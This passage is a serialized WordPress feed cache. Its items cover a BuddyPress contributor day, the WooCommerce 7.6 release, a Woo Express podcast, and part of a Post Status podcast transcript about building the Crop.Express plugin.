href=\"https://wpfr-net.translate.goog/programme-de-la-journee-de-contribution-organisee-a-paris-le-20-04-2023/?_x_tr_sl=fr&_x_tr_tl=en&_x_tr_hl=fr&_x_tr_pto=wapp\" target=\"_blank\" rel=\"noreferrer noopener\">translated page of the event schedule</a> (Hours are in Central European Summer time).</p>\n\n\n\n<a href=\"https://buddypress.org/wp-content/uploads/1/2023/04/48766199826_c0187b9999_c.jpg\"><img width=\"800\" height=\"533\" src=\"https://buddypress.org/wp-content/uploads/1/2023/04/48766199826_c0187b9999_c.jpg\" alt=\"\" class=\"wp-image-329088\" /></a>Mathieu Viet (@imath / me!) explaining BP contribution during <a href=\"https://paris.wordcamp.org/2019/contributor-day/\" target=\"_blank\" rel=\"noreferrer noopener\">WC Paris Contributor day in 2019</a>\n\n\n\n<span id=\"more-329085\"></span>\n\n\n\n<p><a class=\"bp-suggestions-mention\" href=\"https://buddypress.org/members/imath/\" rel=\"nofollow\">@imath</a> will be there to lead the BuddyPress contributing squad and we&#8217;ll have a lot of work! As we&#8217;re currently working on a very ambitious 12.0 release which main goal is to migrate from our Legacy URL parser to using the WordPress Rewrite API, there are many areas getting your contributions would really help us &amp; make a huge difference! Below are the most important tasks we need to accomplish:</p>\n\n\n\n<ul>\n<li>Code: the <a href=\"https://buddypress.trac.wordpress.org/ticket/4954\">BP Rewrites merge process</a> is still in progress</li>\n\n\n\n<li>Code: we need to build a <a href=\"https://github.com/buddypress/bp-classic\" target=\"_blank\" rel=\"noreferrer noopener\">BP Classic back compatibility plugin</a> to give end users a plan B if some of their plugins are not ready yet when 12.0 will be released.</li>\n\n\n\n<li>Documentation: we need to <a href=\"https://developer.buddypress.org/plugins/\">explain</a> third party Plugin/Theme developers what they need to do to make their work progressively &#8220;BP Rewrites&#8221; ready.</li>\n\n\n\n<li>Documentation: we need to <a href=\"https://codex.buddypress.org/\">explain</a> end-users how the switch we&#8217;re performing will improve their BuddyPress experience (customizable slugs, plain text link compatibility&#8230;).</li>\n\n\n\n<li>Support: we need to have some most common troubleshoot replies ready in order to face the questions or requests for help we&#8217;ll probably receive into our <a href=\"https://buddypress.org/support/\">support forum</a>.</li>\n</ul>\n\n\n\n<p>If you do not have a chance to attend IRL to this contributor day, no worries: you can virtually join us to get involved into these tasks going into our <a href=\"https://wordpress.slack.com/messages/buddypress\" target=\"_blank\" rel=\"noreferrer noopener\">Slack channel</a> on April 20, 2023 from <a rel=\"noreferrer noopener\" href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20230420T0815\" target=\"_blank\">08:15 UTC</a> to <a rel=\"noreferrer noopener\" href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20230420T1530\" target=\"_blank\">15:30 UTC</a>.</p>\n\n\n\n<p><strong>Let&#8217;s contribute to BuddyPress!</strong></p>\n\n\n\n<p><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f355.png\" alt=\"🍕\" class=\"wp-smiley\" /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f91d.png\" alt=\"🤝\" class=\"wp-smiley\" /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/2665.png\" alt=\"♥\" class=\"wp-smiley\" /></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Apr 2023 05:49:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mathieu Viet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"WPTavern: WooCommerce 7.6 Introduces Single Product Details Block and “Add to Cart” Form Block\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143628\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"https://wptavern.com/woocommerce-7-6-introduces-single-product-details-block-and-add-to-cart-form-block\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2657:\"<p><a href=\"https://developer.woocommerce.com/2023/04/13/woocommerce-7-6-released/\">WooCommerce 7.6</a> was released today with two new blocks merged from the WooCommerce Blocks plugin. The Single Product Details block and the &#8220;Add to Cart&#8221; Form block are now available to store owners who want to use the Site Editor to design their own Single Product Templates. </p>\n\n\n\n<p>Along with the button, the &#8220;Add to Cart&#8221; form block will automatically display additional options, depending on if the product has a set available quantity or variations.</p>\n\n\n\n<img />image credit: <a href=\"https://developer.woocommerce.com/2023/04/13/woocommerce-7-6-released/\">WooCommerce 7.6 release post</a>\n\n\n\n<p>In templates where store owners are displaying multiple products, attributes filtering has been improved for the Products block. Inside the editor, there is now a collapsible menu for selecting attributes and filtering the display. It also shows a live preview of the products that will be included in this view.</p>\n\n\n\n<p>For those who are designing pages and templates with patterns, WooCommerce 7.6 makes it much easier to get a consistent design with improved, scalable margins for patterns using the Products block.</p>\n\n\n\n<p>This release also improves the Mini Cart block&#8217;s performance, with content preloaded, and an appearance that more closely matches the site&#8217;s active theme.</p>\n\n\n\n<p>WooCommerce 7.6 includes several important updates for developers, including the following:</p>\n\n\n\n<ul>\n<li>Clearer, renamed event names in block-based Checkout</li>\n\n\n\n<li>Reintroduced cache for orders (after it was reverted due to causing an infinite loop on activation) when custom tables are enabled </li>\n\n\n\n<li>Added an encoding selector to the product importer</li>\n\n\n\n<li>Add/Remove order coupon actions are now logged in notes</li>\n\n\n\n<li>Products widget can now be sorted by menu_order</li>\n</ul>\n\n\n\n<p>For a more detailed look at the 673 commits in 7.6, check out the full <a href=\"https://github.com/woocommerce/woocommerce/blob/release/7.6/plugins/woocommerce/readme.txt\">changelog</a>, which references each pull request included in the release. </p>\n\n\n\n<p>WooCommerce has also released its <a href=\"https://developer.woocommerce.com/2023/04/13/woocommerce-contributor-day-guide/\">Contributor Day Guide</a> today for the upcoming 24-hour virtual event on April 19, 2023. There are instructions for how to get your development environment set up for contributing and how to join the Woo Community Slack. The guide outlines specific topics and tickets that will be addressed, with dedicated Slack channels for each.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Apr 2023 03:16:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"Do The Woo Community: Building a Better WooCommerce Hosting Ecosystem with Beau Lebens\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=74755\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://dothewoo.io/woo-express-with-beau-lebens/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:404:\"<p>The new hosting option Woo Express brings a lot to the ecosystem for users, builders and other hosting companies. </p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/woo-express-with-beau-lebens/\">Building a Better WooCommerce Hosting Ecosystem with Beau Lebens</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 13 Apr 2023 08:13:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"Post Status: Launching a WordPress Product in Public: Session 9\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=148930\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://poststatus.com/launching-a-wordpress-product-in-public-session-9/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:50706:\"<div class=\"wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background is-layout-flow\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\"><a href=\"https://twitter.com/coreymaass\">Corey Maass</a> and <a href=\"https://twitter.com/corymiller303\">Cory Miller</a> continue the development of their new WordPress plugin, <a href=\"https://crop.express/\">Crop.Express</a>. In this conversation, they share their experiences and challenges in creating the plugin, including the importance of user feedback and testing. They also talk about their decision to make the plugin open-source, the potential benefits of doing so, and the importance of community involvement in the process. </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n<span class=\"span-reading-time rt-reading-time\"><span class=\"rt-label rt-prefix\">Estimated Reading Time:</span> <span class=\"rt-time\"> 26</span> <span class=\"rt-label rt-postfix\">minutes</span></span>\n</div></div>\n\n\n\n\n\n\n\n<p><a href=\"https://poststatus.com/planet/feed/#h-transcript\">Transcript</a> ↓</p>\n\n\n\n<p>In this episode, <a href=\"https://twitter.com/corymiller303\">Cory Miller</a> and <a href=\"https://twitter.com/coreymaass\">Corey Maass</a> share their insights and experience about the challenges of finding the right balance between simplicity and complexity and the importance of testing and documentation. They also share their personal stories of how they got started with WordPress and how their experiences have shaped their approach to plugin development. For anyone interested in developing WordPress plugins, especially if you are looking to improve your development process and create more user-friendly plugins, this episode is a must-listen.</p>\n\n\n\n<p><strong>Top Takeaways:</strong></p>\n\n\n\n<ul>\n<li><strong>Building a successful plugin requires a deep understanding of user needs and pain points: </strong>Understanding your users&#8217; needs and pain points to develop a plugin that solves their problems effectively is critical. This requires continuous user testing and feedback to improve functionality and user experience.</li>\n\n\n\n<li><strong>Collaboration and communication are crucial for plugin development: </strong>Plugin development is a team effort that requires effective communication, collaboration, and project management. Clear communication channels, regular meetings, and shared project management tools help ensure everyone is on the same page.</li>\n\n\n\n<li><strong>Monetization strategies should align with user value: </strong>Considering various monetization strategies for plugins, including premium features, subscriptions, and sponsorships, is helpful. Your chosen strategy should align with the user&#8217;s value proposition and offer a fair exchange of value. Being transparent with users about the plugin&#8217;s monetization strategy and how it impacts their experience is important for successful adoption.</li>\n</ul>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>\n\n\n\n<h3 class=\"eplus-wrapper wp-block-heading\" id=\"h-mentioned-in-the-show\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f517.png\" alt=\"🔗\" class=\"wp-smiley\" /> Mentioned in the show:</h3>\n\n\n\n<ul>\n<li><a href=\"https://crop.express/\">Crop.Express</a></li>\n\n\n\n<li><a href=\"https://wpengine.com/\">WPEngine</a></li>\n\n\n\n<li><a href=\"https://pagely.com/\">Pagely</a></li>\n\n\n\n<li><a href=\"https://www.studiopress.com/\">StudioPress</a></li>\n</ul>\n\n\n\n<h3 class=\"eplus-wrapper wp-block-heading\" id=\"h-you-can-follow-post-status-and-our-guests-on-twitter\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f426.png\" alt=\"🐦\" class=\"wp-smiley\" /> You can follow Post Status and our guests on Twitter:</h3>\n\n\n\n<ul class=\"eplus-wrapper\">\n<li><a href=\"http://twitter.com/coreymaass\">Corey Maass</a></li>\n\n\n\n<li><a href=\"https://twitter.com/corymiller303\">Cory Miller</a> (CEO, <a href=\"https://twitter.com/post_status\">Post Status</a>)</li>\n\n\n\n<li><a href=\"https://twitter.com/lemonadecode\">Olivia Bisset</a> (Intern, <a href=\"https://twitter.com/post_status\">Post Status</a>)</li>\n</ul>\n\n\n\n<p class=\"eplus-wrapper has-background\">The <strong>Post Status Draft</strong> podcast is geared toward WordPress professionals, with interviews, news, and deep analysis. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f4dd.png\" alt=\"📝\" class=\"wp-smiley\" /><br /><br /><a href=\"https://poststatus.com/category/post-status-podcasts/\" target=\"_blank\" rel=\"noreferrer noopener\">Browse our archives</a>, and don’t forget to subscribe via <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\" target=\"_blank\" rel=\"noreferrer noopener\">iTunes</a>, <a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9mZWVkcy5zaW1wbGVjYXN0LmNvbS8ySkU5c2M4UA\" target=\"_blank\" rel=\"noreferrer noopener\">Google Podcasts</a>, <a href=\"https://www.youtube.com/c/PostStatus\" target=\"_blank\" rel=\"noreferrer noopener\">YouTube</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\" target=\"_blank\" rel=\"noreferrer noopener\">Stitcher</a>, <a href=\"https://wordpress-post-status-draft-podcast.simplecast.com/\" target=\"_blank\" rel=\"noreferrer noopener\">Simplecast</a>, or <a href=\"https://feeds.simplecast.com/2JE9sc8P\">RSS</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f3a7.png\" alt=\"🎧\" class=\"wp-smiley\" /></p>\n\n\n\n<h2 class=\"eplus-wrapper wp-block-heading\" id=\"h-transcript\">Transcript</h2>\n\n\n\n<h2 class=\"wp-block-heading\">Session 9 Corey &amp; Cory Launch a WordPress Product Live</h2>\n\n\n\n<p><strong>Cory Miller:</strong> [00:00:00] So we&#8217;ll also, um, so re read me as the, the big one?&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Yeah. I think that&#8217;s what we cover today.&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Okay. So we&#8217;ll also, uh, okay. All right. Could you hear me?&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Uh, first I can, yeah. Oh, okay. The echo you mean? Yeah. Yeah. The same thing. Mute it. Yeah. Open up YouTube and then close YouTube. But I, I keep the comments open if anybody&#8217;s weighing in.<br /></p>\n\n\n\n<p>Yeah,&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> exactly.<br /></p>\n\n\n\n<p>All right, Corey, this is session nine and we talked last week and we made the decision that we&#8217;re gonna be one this with a couple change. And call it good for now and move on to another [00:01:00] project, um, let it sit and simmer a little bit. Um, so any thoughts that you had based on last week or anything else?<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Yeah, I, I guess I just, I, I&#8217;m glad that we&#8217;re doing this, like I, and, and if for the, for the, the six people watching, You know, but hi, in historically this will be significant. You know, this is where we, uh, figured out how to make our millions. Right. Um, right. But I, I have had a lot of success not in a, in a project sense in the past of letting things.<br /></p>\n\n\n\n<p>Uh, and so I definitely like, cuz we could keep banging away at Crop Express, adding more features. And there&#8217;s still a few things that I wanna add. Like, I definitely wanna put a bow on it. Um, and I definitely think that it&#8217;s something for [00:02:00] us to talk about, promote, you know, we&#8217;ll send copies to, um, blogs.<br /></p>\n\n\n\n<p>Like let&#8217;s still have some of those conversations that, um, you talked about. As much because I want to talk to those people. I think it&#8217;d be fun. Um, but I also think that it takes the pressure off of us like, you know, Having this, having this thing and going, okay, what, what&#8217;s happening with it today?<br /></p>\n\n\n\n<p>What&#8217;s hap when Sometimes you just honestly need some time to go by. Um, and some people to mess with it and some people do mess with it enough to say, oh man, I wish it did this. And then, and then still ha use it for two more days before they finally do send us an email that&#8217;s like, okay, hey, I&#8217;ve been thinking about this for a couple of days.<br /></p>\n\n\n\n<p>Boy, I wish it did this, you know? Just because we&#8217;re thinking a lot about it doesn&#8217;t mean anybody else&#8217;s.&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Yeah. And I think there&#8217;s two things when you&#8217;re saying that came to mind is the get something [00:03:00] out, sit on it a bit, let it just kind of cook or just kind of be Yeah. I think it&#8217;s interesting. And then, um, is, is great for this.<br /></p>\n\n\n\n<p>And then second is.<br /></p>\n\n\n\n<p>I forgot what I was gonna say. Um, but the second is we have the feedback loop, right. Um, within the plugin. So, you know, we, we never know. Um, might be something I think we, we felt like there was something. Better to chase that. We discovered through this, which I look at product as discovery, you know, especially our product, you know, when you got a working product and you&#8217;re just adding things, that&#8217;s way easier.<br /></p>\n\n\n\n<p>Um, working product, meaning people are paying money for it in my mind. Um, we already know it&#8217;s functional and works. Um, but yeah, and I think, you know, just to talk about our decision for a second, we saw. More [00:04:00] opportunity on another direction that we discovered something you&#8217;d been working on in parallel.<br /></p>\n\n\n\n<p>Um, we&#8217;re not ready to talk about that just yet cause we wanna get some things going, but I think that&#8217;s part of the product trail is, you know, discovery, what&#8217;s over the next mountain. And I don&#8217;t know about you, but I go, I gotta put multiple things in the. To see what actually hits. Oh, yeah. Um, I, I feel like you and I built enough of a case for the other thing that, um, is really interesting.<br /></p>\n\n\n\n<p>It seems like there&#8217;s something there. So coming back to the cycle of like, okay, we&#8217;d like this. We think this would be good. Mm-hmm. Other people, you know, would help. Um, anyway, I don&#8217;t wanna get off on that for a second, but I did wanna at least unpack a little bit of our decision. You know, Colin v1 with a couple of these tweaks, um, good.<br /></p>\n\n\n\n<p>And all that, and say, it&#8217;s always a safari. Yes. [00:05:00]&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Yeah. And I, you know, I, it&#8217;s an ongoing conversation, I think is the other good metaphor. It&#8217;s, it&#8217;s literal for, in our case, but it&#8217;s also a good metaphor that as you talk, you uncover more things. You go, oh, I didn&#8217;t think about this. And it&#8217;s, um, so I guess the analogy too is, Concepts have to simmer.<br /></p>\n\n\n\n<p>Ideas have to simmer, you know, the cadence of you and I chatting once a week, you know, occasionally a little bit more, but, uh, gives us a chance to go, okay, so this happened this week where this new other thing came out this week where this new, um, you know, product caught my eye that isn&#8217;t related, but it sparked an idea, dot, dot, dot.<br /></p>\n\n\n\n<p>Like it&#8217;s, you know, trying to, trying to get it all done, you know, hackathon. Is a neat exercise, but I don&#8217;t think it&#8217;s the, the true arc of, of most products journeys. So, um, but I definitely, [00:06:00] oh, the one thing that I didn&#8217;t tell you about is I did get my first email from crop.express, the website of somebody asking specifically, I have a client website, they need the image to be exactly these pixel proportions.<br /></p>\n\n\n\n<p>So not even an aspect ratio. And uh, I was like, oh, okay. You know, so I think that I, I want to think about again, as we&#8217;re talking about sort of putting a bow on v1 uh, accounting for that situation, and then to me that kind of, again, we&#8217;ve, we&#8217;ve completed a. Product. It solves the problem. It solves the problem everywhere that we think that it matters.<br /></p>\n\n\n\n<p>Um, it solves the problem for all of the scenarios that we currently know about. And this is where, like you said, we&#8217;re wait, waiting for feedback. We&#8217;re waiting for people to say, oh, hey, you know, aspect ratio [00:07:00] isn&#8217;t really what I need, but I need is image or is pixel size. Uh, which technically can be done in the, I had added bin and max pixel stuff.<br /></p>\n\n\n\n<p>Like I, I think, you know, kind of like your feedback last week, like this settings page is the advanced settings, or it feels, you know, um, it feels like a 200 level class or whatever. Um, And so, you know, looking at simplifying that, but then, uh, yeah, letting it, letting it ride. Um, and, and at that point, like I said, I&#8217;m really excited about getting it at actually installing it onto my client&#8217;s websites and going, all right, Guinea pigs dance.<br /></p>\n\n\n\n<p>You now have to use my plugin. But I&#8217;ve, even, this week it came up again where, um, one of my clients was like, you know, trying to, trying to get an image. Onto the site correctly. And I had to walk her through some stuff. It&#8217;s like, don&#8217;t mention the plugin yet. Don&#8217;t mention the [00:08:00] plugin yet, but as soon as I introduce it and walk them through it, you know, so I think it&#8217;ll solve problems for them.<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Yeah, a absolutely. Um, it, this whole conversation, and this relates to crop express now,<br /></p>\n\n\n\n<p>uh, made me think of. But also kudos for like a, you, you saw an opportunity there with your client, like, so that&#8217;s like the validation of, you know, is this, is this a valuable thing? Mm-hmm. You&#8217;ve seen this a bunch of times where I wanted to share for anybody that&#8217;s listened later is I always come back to this, so it seems like, like I&#8217;ve majored in the pains.<br /></p>\n\n\n\n<p>Um, specifically with utility software in the past. The thing that&#8217;s really always compelling to me is gains. And I know you worked at O Opt Montreal at one point and I go, that was my classic example. We did utility things that [00:09:00] I themes and you know, you look at the gain, you look at like an e-commerce site or something, a marketing software or something like that, and it&#8217;s like that&#8217;s, I haven&#8217;t really camped.<br /></p>\n\n\n\n<p>Had a product. I don&#8217;t think that camps out in the gain side. Yeah. Um, but I think we&#8217;ve been doing this work too, is coming back to who is our customer for this. Mm-hmm. Whether it&#8217;s ourselves for sure. And then we&#8217;re developing out the profile for there. Like could this be something that&#8217;s something when we start and talk about the next project publicly, um, so that we can, that&#8217;s something I want to do better is go, okay, let&#8217;s identify.<br /></p>\n\n\n\n<p>The person that might have this problem or frustration or issue. This is a whole concept I&#8217;m trying to get to. What&#8217;s the amount of pain? Somebody goes, I&#8217;ll pay for it. What&#8217;s the amount of gain? Somebody goes, I&#8217;ll pay for it. You know? Yep. That&#8217;s [00:10:00] some of my learning as I&#8217;ve gone, is gone. Okay. Like when we created backup buddy.<br /></p>\n\n\n\n<p>Um, the de the developer goes, Hey, I think we should, WordPress needs a holistic backup solution. And I was like, I just go, yeah, because a hundred percent theoretical market at that time. Um, so it&#8217;s pretty easy. I think WordPress has got enough things out there. It&#8217;s interesting from a competitive standpoint is where&#8217;s that ideal place?<br /></p>\n\n\n\n<p>So, I don&#8217;t know, I wanna throw some of that up to you and see if you had any comments. Cause you always have something really help. Uh, that changes my perspective a little bit, but it&#8217;s like this balance, this is a formula for how products and services, different things get up and then, you know, nailing that customer, they go, oh man, that, that would, you know, when you get that feeling of like, oh, this would help me so much.<br /></p>\n\n\n\n<p>That&#8217;s the magic right there. Yeah.&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> And. [00:11:00] I&#8217;m, I&#8217;m definitely, I&#8217;ve also had some similar thoughts in that it&#8217;s, it is a, I think, a slightly different way of thinking about product. Right. And the looking for pain is a very popular, um, Hundred level, I guess. Apparently I&#8217;m making college analogies today. Um, but like you look at, um, Amy Hoy, Justin Jackson, uh, Rob Walling, like the, the startup thought leaders, um, who put out a lot of great content and have done for decades.<br /></p>\n\n\n\n<p>Arguably, um, the, the thinking for a long time has been okay. You are an aspir. Probably solopreneur. You are a entrepreneur, and I don&#8217;t mean that negatively, but the, like you are an aspiring, uh, you, you have an entrepreneurial spirit without [00:12:00] experience, right? So you, you&#8217;re, you want to start your entrepreneur journey.<br /></p>\n\n\n\n<p>Um, and, uh, a very popular formula to start with because honestly, I think. I know it&#8217;s generally more reliable as a beginner, um, is pain. And so there&#8217;s all these ideas about like, okay, you get on a forum for fishermen where all the fishermen are talking and you kind of listen to their conversations and, and when they keep talking about like, boy at dawn I wish I had, you know, a certain kind of light.<br /></p>\n\n\n\n<p>And that&#8217;s where you go, ah, That&#8217;s a pain. Now I can go try to solve it. Um, which is very different from, oh, I&#8217;m now, I&#8217;m blanking on the name. Um, but there was, um, a product that came out years ago and it just [00:13:00] popped up on my radar again. Oh, Prezi. P r e z I. Mm-hmm. I think, right?&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Mm-hmm. Yeah. I remember Prezi,&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> that was a hundred percent a solution, looking for a.<br /></p>\n\n\n\n<p>It was a really neat, in, in, I mean, we still have the slides paradigm, the, you know, uh, PowerPoint, Google presentation paradigm, rectangle, rectangle, rectangle. And Prezi had this really neat software that they built online, which was very impressive at the time, cuz again, it was probably 10 years ago, but where you had a, it was kind of like a, an interactive mind map.<br /></p>\n\n\n\n<p>And so you had a point that had something. Concept off of it. And you&#8217;d zoom around, you&#8217;d sort of fly around this, this presentation and it was extremely novel. But I think every person built one presentation in it and was like, this is neat, but it&#8217;s very clear that I&#8217;m using this software cuz it does one thing.<br /></p>\n\n\n\n<p>Um, and they did a really good [00:14:00] job, I think, of marketing and finding a use for this and marketing it, but they. Couldn&#8217;t become the presentation standard that they&#8217;d hoped to because they changed. It was too specific, you know? Um, and that&#8217;s always the fear. It&#8217;s definitely more fun sometimes. Um, and I&#8217;ve definitely built a lot of products that were a concept and it was like, oh, I think I have a different way of approaching.<br /></p>\n\n\n\n<p>Uh, you know, project management to-do lists, time tracking the standard paradigms, but like, uh, instead of it being a vertical list, you know, it&#8217;s horizontal or whatever the, whatever, it&#8217;s, um, and I think that it&#8217;s you, it&#8217;s then tough because if you&#8217;re, if you&#8217;re on one end of the spectrum, you can, you can only present gain.<br /></p>\n\n\n\n<p>Like Prezi, where it&#8217;s a, where it&#8217;s, I hate to use the word gimmick, [00:15:00] but where it&#8217;s, again, a, a prob a solution looking for a problem that&#8217;s dangerous, that&#8217;s very, very difficult to change a paradigm. Like they did not change the way all presentations are. Look, they couldn&#8217;t. Um, and then on the other end of the spectrum, you know, what we&#8217;ve, what we&#8217;ve talking about is, um, a hundred percent solving for a pain.<br /></p>\n\n\n\n<p>It&#8217;s. Fishermen need a flashlight at dawn, build the flashlight. You&#8217;re done. And so what we start talking about is somewhere in the middle. Um, and it&#8217;s, and it, again, I think just a different way of, of thinking, uh, it&#8217;s gonna be more challenging for you, marketing it, more challenging for both of us or anybody to talk about it.<br /></p>\n\n\n\n<p>Um, if it isn&#8217;t a problem that people are already trying to solve. And I think what we&#8217;re, you know, I do, I do anticipate landing [00:16:00] somewhere in the middle, like crop Express I think is a good example of, it&#8217;s definitely a pain, but people are solving it by going elsewhere. They&#8217;re going to Photoshop, they&#8217;re going to crop.express, and we&#8217;re kind of bringing it to them.<br /></p>\n\n\n\n<p>Um, and so I think that I, I hope to still kind of do some of that stuff. Um, but then also, You know, maybe introduce concepts that, that WordPress doesn&#8217;t currently have, paradigms that, that WordPress doesn&#8217;t currently, uh, have its arms around. And so I&#8217;m kinda excited for all that. It&#8217;s also, I think it being more on that spectrum, it&#8217;s, it&#8217;s, it&#8217;s more creative.<br /></p>\n\n\n\n<p>It&#8217;s more fun for us.&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Yeah. So yeah, a absolutely. You know, we, it seems like we&#8217;re using that whole thing is build something for yourself. And we&#8217;re using problems we see for ourselves using the new [00:17:00] thing we&#8217;re talking about, using word pr, um, post status and your clients and things. And it makes me think like the game pain conversation on that when we show that we can.<br /></p>\n\n\n\n<p>What I wrote down when, when we, just a minute ago was, you 